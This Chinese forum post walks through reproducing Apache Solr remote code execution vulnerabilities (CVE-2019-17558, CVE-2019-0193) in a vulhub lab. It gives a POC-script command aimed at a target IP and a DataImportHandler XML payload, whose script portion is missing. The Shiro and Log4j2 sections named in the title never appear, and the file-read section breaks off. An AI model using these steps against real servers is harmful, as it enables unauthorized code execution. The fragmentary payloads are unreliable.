ToB企服应用市场:ToB评测及商务社交产业平台

标题: Solr Shiro Log4j2 命令执行--文件读取--反序列化--身份权限绕过--命令执行 [打印本页]

作者: 拉不拉稀肚拉稀    时间: 2023-10-22 00:00
标题: Solr Shiro Log4j2 命令执行--文件读取--反序列化--身份权限绕过--命令执行
Solr Shiro  Log4j2 命令执行--文件读取--反序列化--身份权限绕过--命令执行

solr 远程命令执行 (CVE-2019-17558)

漏洞简介

Apache Velocity是一个基于Java的模板引擎,它提供了一个模板语言去引用由Java代码定义的对象。Velocity是Apache基金会旗下的一个开源软件项目,旨在确保Web应用程序在表示层和业务逻辑层之间的隔离(即MVC设计模式)。 Apache Solr 5.0.0版本至8.3.1版本中存在输入验证错误漏洞。攻击者可借助自定义的Velocity模板功能,利用Velocity-SSTI漏洞在Solr系统上执行任意代码。
影响范围

Apache Solr 5.0.0版本至8.3.1版本
默认端口

8983
漏洞复现

POC下载solr_rce
  1. python2 .\solr_rce.py 目标IP 命令
复制代码
solr  远程命令执行漏洞(CVE-2019-0193)

影响范围

Apache Solr < 8.2.0版本
利用条件

条件1:Apache Solr的DataImportHandler启用了模块DataImportHandler(默认不会被启用)
条件2:Solr Admin UI未开启鉴权认证。(默认情况无需任何认证)
漏洞复现

使用得vulhub得靶场,需要提前创建一个core才能进行复现
使用vulhub创建名为test得core
  1. docker-compose exec solr bash bin/solr create_core -c test -d example/example-DIH/solr/db
复制代码
Solr Admin UI未开启鉴权认证就是可以直接访问如下界面,默认得配置就可以直接访问

选择已有核心后选择Dataimport功能并选择debug模式,更改填入以下POC,点击Execute with this Confuguration

POC:
  1. <dataConfig>
  2.   <dataSource type="URLDataSource"/>
  3.   
  4.   <document>
  5.     <entity name="stackoverflow"
  6.             url="https://stackoverflow.com/feeds/tag/solr"
  7.             processor="XPathEntityProcessor"
  8.             forEach="/feed"
  9.             transformer="script:poc" />
  10.   </document>
  11. </dataConfig>
复制代码
Solr 文件读取&SSRF (CVE-2021-27905)

漏洞简介

该漏洞是由于没有对输入的内容进行校验,攻击者可利用该漏洞在未授权的情况下,构造恶意数据执行SSRF攻击,最终造成任意读取服务器上的文件。
影响范围


Apache Solr




欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/) Powered by Discuz! X3.4